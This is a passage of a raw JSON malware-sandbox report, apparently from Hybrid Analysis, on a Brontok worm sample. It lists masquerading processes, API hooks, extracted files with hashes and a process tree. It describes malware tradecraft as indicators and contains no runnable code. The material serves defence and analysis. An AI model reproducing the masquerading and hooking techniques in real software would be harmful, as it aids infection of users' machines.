\"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005728)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002300)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003120)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003380)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005952)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005956)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003572)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005752)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006032)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003560)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005212)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001452)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004012)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004244)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003536)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002752)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004356)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004364)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004932)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002124)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003508)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"4k51k4.exe\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201
https://hybrid-analysis.com/sample/ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201
Hybrid Analysis - Killers
{"size": 93728, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "av_detect": 87, "vx_family": "Worm.Brontok", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 64, "total_signatures": 137, "extracted_files": [{"name": "services.exe", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "lsass.exe", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "winlogon.exe", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "smss.exe", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "csrss.exe", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 93728, "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22, "file_available_to_download": true}, {"name": "4k51k4.exe.bin", "file_size": 93728, "sha256": "00d026b15cbe511414b6280ef9bde6c977ab8736d1072717732c1ebffb8767ff", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "shell.exe", "file_size": 93728, "sha256": "a1780f184cce8baafdb10f2f0cffb11fa6488c9adec34547304c6d4981d67b64", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Empty.pif", "file_size": 93728, "sha256": "2cfac59b9a483ebc97a6691a52d7f6f47eaad05a306e1253ba4a6bafb01421c8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9C38A.bin", "file_size": 93728, "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE.bin", "file_size": 93728, "sha256": "2b3be180729d24aace0951d074d1b3b31e5fbaafe912d7c8a473b120467b61d7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9DE16.bin", "file_size": 93728, "sha256": "d7554af457c17be059e9be6f3314a74caffe2db8227849219593eab9cb497074", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_size": 93728, "sha256": "5d66b21fe3da2ae200f6c34df12cbcec9397ddfb2e94a749842b6edee1e5d122", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9DF9D.bin", "file_size": 93728, "sha256": "8d9a0e2f268d89a97487244a776b8a9f4adc17f49bfaacff77f1a1e303a21527", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_size": 93728, "sha256": "a4bc97f6d9067cceb6a9b6c770bd50deb0bbbb9d55acdb63c88d7f34990ac49b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_size": 93728, "sha256": "854c91813eede84cad04c0d8bb5cafdb900f6f9f2b799f735cfbeea4077e72e6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "MrHelloween.scr", "file_size": 93728, "sha256": "a725b616827055162c3e555e9ce8fcb9130c35af22c2ce4e74ad02c644533351", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9C38C.bin", "file_size": 93728, "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "WINLOGON.EXE", "file_size": 93728, "sha256": "9f3724961b6589b36e2ce66eed5f672c26e59a175840c9898496593592759bc8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Folder.htt", "file_size": 640, "sha256": "fe222b08327bbfb35cbd627c0526ba7b5755b02ce0a95823a4c0bf58e601d061", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "runtime_process": "IExplorer.exe (PID: 5272)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Puisi.txt", "file_size": 442, "sha256": "660ecfcd91ba19959d0c348724da95d7fd6dd57359898e6e3bcce600ff3c797d", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_size": 93728, "sha256": "00d026b15cbe511414b6280ef9bde6c977ab8736d1072717732c1ebffb8767ff", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_size": 93728, "sha256": "8d9a0e2f268d89a97487244a776b8a9f4adc17f49bfaacff77f1a1e303a21527", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "New Folder.exe", "file_size": 93728, "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Data HAPUBWS.exe", "file_size": 93728, "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4K51K4.EXE.67A9DF99.bin", "file_size": 93728, "sha256": "00d026b15cbe511414b6280ef9bde6c977ab8736d1072717732c1ebffb8767ff", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_size": 93728, "sha256": "2b3be180729d24aace0951d074d1b3b31e5fbaafe912d7c8a473b120467b61d7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67A9DE19.bin", "file_size": 93728, "sha256": "8d9a0e2f268d89a97487244a776b8a9f4adc17f49bfaacff77f1a1e303a21527", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00005192", "name": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe", "normalized_path": "C:\\ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe", "sha256": "ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201", "av_label": "Worm.Brontok", "av_matched": 16, "av_total": 22}, {"uid": "00000000-00005636", "parentuid": "00000000-00005192", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00003900", "parentuid": "00000000-00005636", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00005632", "parentuid": "00000000-00005636", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00002108", "parentuid": "00000000-00005636", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00000812", "parentuid": "00000000-00002108", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00005000", "parentuid": "00000000-00002108", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00003156", "parentuid": "00000000-00002108", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00004188", "parentuid": "00000000-00002108", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00004348", "parentuid": "00000000-00002108", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00004580", "parentuid": "00000000-00002108", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00004116", "parentuid": "00000000-00002108", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00003236", "parentuid": "00000000-00005636", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00002164", "parentuid": "00000000-00005636", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00000944", "parentuid": "00000000-00005636", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00005912", "parentuid": "00000000-00000944", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00005892", "parentuid": "00000000-00000944", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00005804", "parentuid": "00000000-00000944", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00004780", "parentuid": "00000000-00000944", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00004440", "parentuid": "00000000-00000944", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00004020", "parentuid": "00000000-00000944", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00004540", "parentuid": "00000000-00000944", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00005508", "parentuid": "00000000-00005636", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00005272", "parentuid": "00000000-00005192", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00004156", "parentuid": "00000000-00005272", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00005500", "parentuid": "00000000-00005272", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00003752", "parentuid": "00000000-00005272", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00003220", "parentuid": "00000000-00005272", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00005308", "parentuid": "00000000-00005272", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00005584", "parentuid": "00000000-00005272", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00000656", "parentuid": "00000000-00005272", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00006104", "parentuid": "00000000-00000656", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00004200", "parentuid": "00000000-00000656", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00003868", "parentuid": "00000000-00000656", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00001556", "parentuid": "00000000-00000656", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00004492", "parentuid": "00000000-00000656", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00004740", "parentuid": "00000000-00000656", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00003740", "parentuid": "00000000-00000656", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00005328", "parentuid": "00000000-00005192", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00003136", "parentuid": "00000000-00005192", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00000932", "parentuid": "00000000-00003136", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00005732", "parentuid": "00000000-00003136", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00005928", "parentuid": "00000000-00003136", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00006064", "parentuid": "00000000-00003136", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00006016", "parentuid": "00000000-00003136", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00001208", "parentuid": "00000000-00003136", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00004144", "parentuid": "00000000-00003136", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "09ef5b763c7ebe346ab89267a3a4cf2497d1d43c217044d510907d37082a0f3c"}, {"uid": "00000000-00005756", "parentuid": "00000000-00005192", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00001872", "parentuid": "00000000-00005756", "name": "4k51k4.exe", "normalized_path": "%WINDIR%\\4k51k4.exe", "sha256": "1d93926c73d54bd6c762d81d9c5f339503be592c0c31bcc46fb8bcfef674e3f8"}, {"uid": "00000000-00005428", "parentuid": "00000000-00005756", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "eaee366466cf4b6944668491397a325790a212f3986bc73e0759afcf01a91ca6"}, {"uid": "00000000-00006032", "parentuid": "00000000-00005756", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00004288", "parentuid": "00000000-00005756", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "cf0c443f65a3d7acafa1c6d2ee0bed4fdb6621e5bc7dbba840ac01e11fe994b0"}, {"uid": "00000000-00005936", "parentuid": "00000000-00005756", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "8e71139de40cb7dafccf024b52fdd5507090845377f527ce327ccb4914a09d39"}, {"uid": "00000000-00005548", "parentuid": "00000000-00005756", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "c4b100c0cecdd107a77c5ba03e773236796ff809928042bca8628fb0e111bbbe"}, {"uid": "00000000-00002432", "parentuid": "00000000-00005756", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": 